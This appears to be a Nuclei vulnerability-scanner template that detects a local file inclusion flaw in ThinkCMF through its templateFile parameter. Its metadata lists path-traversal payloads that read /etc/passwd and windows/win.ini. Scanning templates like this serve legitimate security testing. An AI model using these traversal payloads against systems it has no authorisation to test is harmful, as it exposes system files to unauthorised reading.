id: thinkcmf-lfi

info:
  name: ThinkCMF - Local File Inclusion
  author: pikpikcu
  severity: high
  description: ThinkCMF is vulnerable to local file inclusion.
  reference:
    - https://www.freebuf.com/vuls/217586.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
    win-payload: ../../../../../../../../../../../../../../../../windows/win.ini
    unix-payload: ../../../../../../../../../../../../../../../../etc/passwd
  tags: thinkcmf,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/?a=display&templateFile=README.md"

    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - "ThinkCMF"
          - "## README"
          - "## UPDATE"

      - type: status
        status:
          - 200

# digest: 490a00463044022035ae17d9262499d8c4df87fb43d174d27e8dc9d41cd2bcd39d80e143ecb8f79502204091475b206c1d68b7603e7fb7d435764b689ec85a8cc7c8083bcfcb81a85e44:922c64590222798bb761d5b6d8e72950
